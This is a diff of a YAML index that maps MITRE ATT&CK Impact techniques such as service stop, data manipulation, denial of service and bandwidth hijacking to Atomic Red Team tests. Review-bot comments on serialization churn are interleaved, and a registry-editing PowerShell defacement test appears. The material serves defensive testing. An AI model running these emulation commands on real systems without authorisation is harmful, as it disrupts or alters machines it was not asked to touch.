- United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+ url: https://www.justice.gov/opa/press-release/file/1092091/download
- source_name: FireEye APT38 Oct 2018
- url: https://content.fireeye.com/apt/rpt-apt38
description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
November 6, 2018.'
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
-
- Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Stored Data Manipulation
- x_mitre_detection: Where applicable, inspect important file hashes, locations,
- and modifications for suspicious/unexpected values.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: impact
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'File: File Modification'
- - 'File: File Creation'
- - 'File: File Deletion'
- x_mitre_impact_type:
- - Integrity
- x_mitre_attack_spec_version: 2.1.0
+ url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1489:
technique:
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
- created: '2019-03-29T19:00:55.901Z'
- x_mitre_version: '1.2'
- external_references:
- - source_name: mitre-attack
- external_id: T1489
- url: https://attack.mitre.org/techniques/T1489
- - source_name: SecureWorks WannaCry Analysis
- url: https://www.secureworks.com/research/wcry-ransomware-analysis
- description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
- Analysis. Retrieved March 26, 2019.
- - source_name: Talos Olympic Destroyer 2018
- url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
- description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
- Takes Aim At Winter Olympics. Retrieved March 14, 2019.
- - source_name: Novetta Blockbuster
- url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
- description: 'Novetta Threat Research Group. (2016, February 24). Operation
- Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
- 25, 2016.'
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-12T15:57:27.380Z'
+ name: Service Stop
description: "Adversaries may stop or disable services on a system to render
those services unavailable to legitimate users. Stopping critical services
or processes can inhibit or stop response to an incident or aid in the adversary's
overall objectives to cause damage to the environment.(Citation: Talos Olympic
Destroyer 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish
this by disabling individual services of high importance to an organization,
- such as MSExchangeIS
, which will make Exchange content inaccessible
- (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable
- many or all services to render systems unusable.(Citation: Talos Olympic Destroyer
+ such as MSExchangeIS
, which will make Exchange content inaccessible.(Citation:
+ Novetta Blockbuster) In some cases, adversaries may stop or disable many or
+ all services to render systems unusable.(Citation: Talos Olympic Destroyer
2018) Services or processes may not allow for modification of their data stores
while running. Adversaries may stop services or processes in order to conduct
[Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted
for Impact](https://attack.mitre.org/techniques/T1486) on the data stores
of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)"
- modified: '2022-11-08T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Service Stop
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor processes and command-line arguments to see if critical processes are terminated or stop running.
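Review bot: two real content changes are buried in the key reordering of T1565.001 and T1489 in this hunk and deserve a mention in the PR description: the FireEye APT38 Oct 2018 reference URL changes from https://content.fireeye.com/apt/rpt-apt38 to https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf, and the T1489 description moves the Novetta citation after the full stop ('inaccessible.(Citation: Novetta Blockbuster) In some cases'). Also, on both the old and new side the description shows a line break between 'such as MSExchangeIS' and ', which will make Exchange content inaccessible'; if that break is really in the serialised double-quoted scalar rather than an artifact of the diff view, the folded string gets a stray space before the comma, so please check the rendered description and rejoin the line if needed.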
@@ -94191,10 +94946,14 @@ impact:
Alterations to the service binary path or the service startup type changed to disabled may be suspicious.
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, ChangeServiceConfigW
may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: impact
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Process: Process Termination'
@@ -94205,9 +94964,32 @@ impact:
- 'Service: Service Metadata'
x_mitre_impact_type:
- Availability
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
+ created: '2019-03-29T19:00:55.901Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1489
+ external_id: T1489
+ - source_name: SecureWorks WannaCry Analysis
+ description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
+ Analysis. Retrieved March 26, 2019.
+ url: https://www.secureworks.com/research/wcry-ransomware-analysis
+ - source_name: Talos Olympic Destroyer 2018
+ description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+ Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+ url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+ - source_name: Novetta Blockbuster
+ description: 'Novetta Threat Research Group. (2016, February 24). Operation
+ Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
+ 25, 2016.'
+ url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1489
atomic_tests:
- name: Windows - Stop service using Service Controller
@@ -94275,32 +95057,7 @@ impact:
name: command_prompt
T1499.004:
technique:
- x_mitre_platforms:
- - Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Linux
- - macOS
- - Google Workspace
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
- type: attack-pattern
- created: '2020-02-20T15:37:27.052Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1499.004
- url: https://attack.mitre.org/techniques/T1499/004
- - source_name: Sucuri BIND9 August 2015
- url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
- description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
- in the Wild. Retrieved April 26, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T15:42:23.001Z'
name: Application or System Exploitation
description: "Adversaries may exploit software vulnerabilities that can cause
an application or system to crash and deny availability to users. (Citation:
@@ -94318,13 +95075,20 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: Attacks targeting web applications may generate logs in the
web server, application server, and/or database server that can be used to
identify the type of attack. Externally monitor the availability of services
that may be targeted by an Endpoint DoS.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Sensor Health: Host Status'
@@ -94332,36 +95096,27 @@ impact:
- 'Network Traffic: Network Traffic Flow'
x_mitre_impact_type:
- Availability
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1565.003:
- technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
type: attack-pattern
- created: '2020-03-02T14:30:05.252Z'
+ id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
+ created: '2020-02-20T15:37:27.052Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1565.003
- url: https://attack.mitre.org/techniques/T1565/003
- - description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
- November 6, 2018.'
- url: https://content.fireeye.com/apt/rpt-apt38
- source_name: FireEye APT38 Oct 2018
- - source_name: DOJ Lazarus Sony 2018
- url: https://www.justice.gov/opa/press-release/file/1092091/download
- description: Department of Justice. (2018, September 6). Criminal Complaint
- - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1499/004
+ external_id: T1499.004
+ - source_name: Sucuri BIND9 August 2015
+ description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
+ in the Wild. Retrieved April 26, 2019.
+ url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1565.003:
+ technique:
+ modified: '2024-10-15T18:21:43.760Z'
name: Runtime Data Manipulation
description: |-
Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
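Review bot: most of this hunk is serialization churn rather than data change: `id`, `type`, `created`, `created_by_ref` and `external_references` are deleted near the top of the record (`- id: attack-pattern--32ad5c86-...`) and re-emitted at the bottom (`+ id: attack-pattern--2bee5ffb-...`), so the diff pairs T1565.003's old keys against T1499.004's new ones and the real changes (`spec_version: '2.1'` dropped, `x_mitre_attack_spec_version` 2.1.0 to 3.2.0, `revoked: false` added) are buried. Suggest the index generator write keys in a fixed order (or the order of the previous file) so a bundle refresh reads as field-level edits; at minimum, call out the `spec_version` removal in the PR description, since any consumer reading that key will now get nothing.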
@@ -94370,11 +95125,17 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: Inspect important application binary file hashes, locations,
and modifications for suspicious/unexpected values.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'File: File Deletion'
@@ -94383,17 +95144,31 @@ impact:
- 'File: File Creation'
x_mitre_impact_type:
- Integrity
- x_mitre_permissions_required:
- - User
- - Administrator
- - root
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
+ created: '2020-03-02T14:30:05.252Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1565/003
+ external_id: T1565.003
+ - source_name: DOJ Lazarus Sony 2018
+ description: Department of Justice. (2018, September 6). Criminal Complaint
+ - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+ url: https://www.justice.gov/opa/press-release/file/1092091/download
+ - source_name: FireEye APT38 Oct 2018
+ description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+ November 6, 2018.'
+ url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1498.002:
technique:
- modified: '2023-03-30T21:01:41.052Z'
+ modified: '2024-10-15T16:04:34.495Z'
name: Reflection Amplification
description: |-
Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017) This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network.
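Review bot: two substantive changes in this hunk are easy to miss among the reordering. `x_mitre_permissions_required` (User/Administrator/root/SYSTEM) is removed from T1565.003 and nothing in the hunk re-adds it, so consumers filtering on that field will silently match nothing; confirm this reflects the upstream bundle rather than a serializer omission. The FireEye APT38 reference also changes URL from `https://content.fireeye.com/apt/rpt-apt38` to `https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf`; worth a quick check that the new link resolves before merging.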
@@ -94402,6 +95177,7 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection of reflection amplification can sometimes be achieved
before the traffic volume is sufficient to cause impact to the availability
of the service, but such response time typically requires very aggressive
@@ -94417,17 +95193,12 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Sensor Health: Host Status'
- 'Network Traffic: Network Traffic Flow'
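Review bot: the real change in this hunk is the removal of `Azure AD`, `Office 365`, `SaaS` and `Google Workspace` from T1498.002's platform list (version 1.3 to 1.4); the `x_mitre_modified_by_ref` removal is only a move. Anything that derives per-platform indexes from `x_mitre_platforms` needs to be regenerated in the same change so this technique drops out of those platform views consistently, and the PR description should state that the platform set is shrinking, because on its own it reads like a loss of coverage rather than an upstream platform consolidation.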
@@ -94437,14 +95208,15 @@ impact:
id: attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01
created: '2020-03-02T20:08:03.691Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1498/002
external_id: T1498.002
- - source_name: Cloudflare ReflectionDoS May 2017
- description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
- (attacks). Retrieved April 23, 2019.
- url: https://blog.cloudflare.com/reflections-on-reflections/
+ - source_name: Cisco DoSdetectNetflow
+ description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+ Retrieved April 25, 2019.
+ url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
- source_name: Cloudflare DNSamplficationDoS
description: Cloudflare. (n.d.). What is a DNS amplification attack?. Retrieved
April 23, 2019.
@@ -94453,28 +95225,28 @@ impact:
description: Cloudflare. (n.d.). What is a NTP amplificaiton attack?. Retrieved
April 23, 2019.
url: https://www.cloudflare.com/learning/ddos/ntp-amplification-ddos-attack/
+ - source_name: Cloudflare ReflectionDoS May 2017
+ description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
+ (attacks). Retrieved April 23, 2019.
+ url: https://blog.cloudflare.com/reflections-on-reflections/
+ - source_name: Cloudflare Memcrashed Feb 2018
+ description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
+ - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
+ url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
- source_name: Arbor AnnualDoSreport Jan 2018
description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
Infrastructure Security Report. Retrieved April 22, 2019.
url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
- - source_name: Cloudflare Memcrashed Feb 2018
- description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
- - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
- url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
- - source_name: Cisco DoSdetectNetflow
- description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
- Retrieved April 25, 2019.
- url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1499.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:05:48.014Z'
name: Service Exhaustion Flood
description: |-
Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.
@@ -94485,7 +95257,6 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- x_mitre_attack_spec_version: 2.1.0
x_mitre_deprecated: false
x_mitre_detection: |-
Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
@@ -94496,17 +95267,12 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Sensor Health: Host Status'
@@ -94543,7 +95309,8 @@ impact:
url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1491:
technique:
@@ -94564,7 +95331,7 @@ impact:
- source_name: mitre-attack
external_id: T1491
url: https://attack.mitre.org/techniques/T1491
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-25T19:34:42.056Z'
name: Defacement
description: "Adversaries may modify visual content available internally or
externally to an enterprise network, thus affecting the integrity of the original
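Review bot: `modified` for T1491 moves backwards here, from `2022-05-11T14:00:00.188Z` to `2022-03-25T19:34:42.056Z`, while every other record in this file moves forward to an October 2024 timestamp. A regressing modification time usually means the record was taken from a different (older) bundle than the rest; please confirm the source used for T1491, or the index will claim an older revision than the one it was just updated from.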
@@ -94591,12 +95358,78 @@ impact:
x_mitre_impact_type:
- Integrity
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ atomic_tests: []
+ T1496.002:
+ technique:
+ modified: '2024-09-25T14:59:35.287Z'
+ name: Bandwidth Hijacking
+ description: "Adversaries may leverage the network bandwidth resources of co-opted
+ systems to complete resource-intensive tasks, which may impact system and/or
+ hosted service availability. \n\nAdversaries may also use malware that leverages
+ a system's network bandwidth as part of a botnet in order to facilitate [Network
+ Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or
+ to seed malicious torrents.(Citation: GoBotKR) Alternatively, they may engage
+ in proxyjacking by selling use of the victims' network bandwidth and IP address
+ to proxyware services.(Citation: Sysdig Proxyjacking) Finally, they may engage
+ in internet-wide scanning in order to identify additional targets for compromise.(Citation:
+ Unit 42 Leaked Environment Variables 2024)\n\nIn addition to incurring potential
+ financial costs or availability disruptions, this technique may cause reputational
+ damage if a victim’s bandwidth is used for illegal activities.(Citation: Sysdig
+ Proxyjacking)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ - IaaS
+ - Containers
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Flow'
+ - 'File: File Creation'
+ - 'Command: Command Execution'
+ - 'Process: Process Creation'
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Connection Creation'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--718cb208-6446-4572-a2f0-9c799c60091e
+ created: '2024-09-25T13:44:35.412Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1496/002
+ external_id: T1496.002
+ - source_name: Sysdig Proxyjacking
+ description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
+ Chat. Retrieved July 6, 2023.
+ url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
+ - source_name: Unit 42 Leaked Environment Variables 2024
+ description: Margaret Kelley, Sean Johnstone, William Gamazo, and Nathaniel
+ Quist. (2024, August 15). Leaked Environment Variables Allow Large-Scale
+ Extortion Operation in Cloud Environments. Retrieved September 25, 2024.
+ url: https://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/
+ - source_name: GoBotKR
+ description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
+ Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
+ url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1657:
technique:
- modified: '2024-04-11T20:22:14.359Z'
+ modified: '2024-10-15T15:58:10.254Z'
name: Financial Theft
description: "Adversaries may steal monetary resources from targets through
extortion, social engineering, technical theft, or other methods aimed at
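Review bot: T1491 loses `x_mitre_attack_spec_version: 2.1.0` at the top of this hunk and, unlike every other record in the diff, nothing in the hunk writes a `3.2.0` replacement, so the record ends up without an attack-spec version at all unless it is emitted elsewhere; please verify. Separately, the new `T1496.002` record is inserted directly after T1491 rather than next to the other T1496.x sub-techniques added further down, which makes the mapping hard to scan; sorting technique ids on output would keep related entries together. The empty `x_mitre_detection: ''` and `atomic_tests: []` are fine for a newly added sub-technique.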
@@ -94629,7 +95462,7 @@ impact:
x_mitre_contributors:
- Blake Strom, Microsoft Threat Intelligence
- Pawel Partyka, Microsoft Threat Intelligence
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -94639,10 +95472,9 @@ impact:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
x_mitre_impact_type:
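Review bot: `Office 365` and `Google Workspace` are replaced by a single `Office Suite` platform for T1657 (version 1.1 to 1.2). Any consumer or index that still keys on the old platform names will no longer match this technique, so either add a mapping from `Office Suite` to the old per-product indexes or document that those indexes are being retired; the same rename should be applied uniformly wherever platforms are listed in this file.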
@@ -94705,7 +95537,6 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1491.001:
technique:
@@ -94746,7 +95577,7 @@ impact:
messages. Since internally defacing systems exposes an adversary''s presence,
it often takes place after other intrusion goals have been accomplished.(Citation:
Novetta Blockbuster Destructive Malware)'
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-28T18:55:35.988Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Defacement: Internal Defacement'
x_mitre_detection: Monitor internal and websites for unplanned content changes.
@@ -94767,7 +95598,6 @@ impact:
- Integrity
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1491.001
atomic_tests:
- name: Replace Desktop Wallpaper
@@ -94858,6 +95688,155 @@ impact:
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText -Value $orgLegalNoticeText -Type String -Force
name: powershell
elevation_required: true
+ T1496.004:
+ technique:
+ modified: '2024-10-16T17:59:27.535Z'
+ name: Cloud Service Hijacking
+ description: "Adversaries may leverage compromised software-as-a-service (SaaS)
+ applications to complete resource-intensive tasks, which may impact hosted
+ service availability. \n\nFor example, adversaries may leverage email and
+ messaging services, such as AWS Simple Email Service (SES), AWS Simple Notification
+ Service (SNS), SendGrid, and Twilio, in order to send large quantities of
+ spam / [Phishing](https://attack.mitre.org/techniques/T1566) emails and SMS
+ messages.(Citation: Invictus IR DangerDev 2024)(Citation: Permiso SES Abuse
+ 2023)(Citation: SentinelLabs SNS Sender 2024) Alternatively, they may engage
+ in LLMJacking by leveraging reverse proxies to hijack the power of cloud-hosted
+ AI models.(Citation: Sysdig LLMJacking 2024)(Citation: Lacework LLMJacking
+ 2024)\n\nIn some cases, adversaries may leverage services that the victim
+ is already using. In others, particularly when the service is part of a larger
+ cloud platform, they may first enable the service.(Citation: Sysdig LLMJacking
+ 2024) Leveraging SaaS applications may cause the victim to incur significant
+ financial costs, use up service quotas, and otherwise impact availability. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Modification'
+ - 'Application Log: Application Log Content'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--924d273c-be0d-4d8d-af58-2dddb15ef1e2
+ created: '2024-09-25T14:05:59.910Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1496/004
+ external_id: T1496.004
+ - source_name: SentinelLabs SNS Sender 2024
+ description: Alex Delamotte. (2024, February 15). SNS Sender | Active Campaigns
+ Unleash Messaging Spam Through the Cloud. Retrieved September 25, 2024.
+ url: https://www.sentinelone.com/labs/sns-sender-active-campaigns-unleash-messaging-spam-through-the-cloud/
+ - source_name: Invictus IR DangerDev 2024
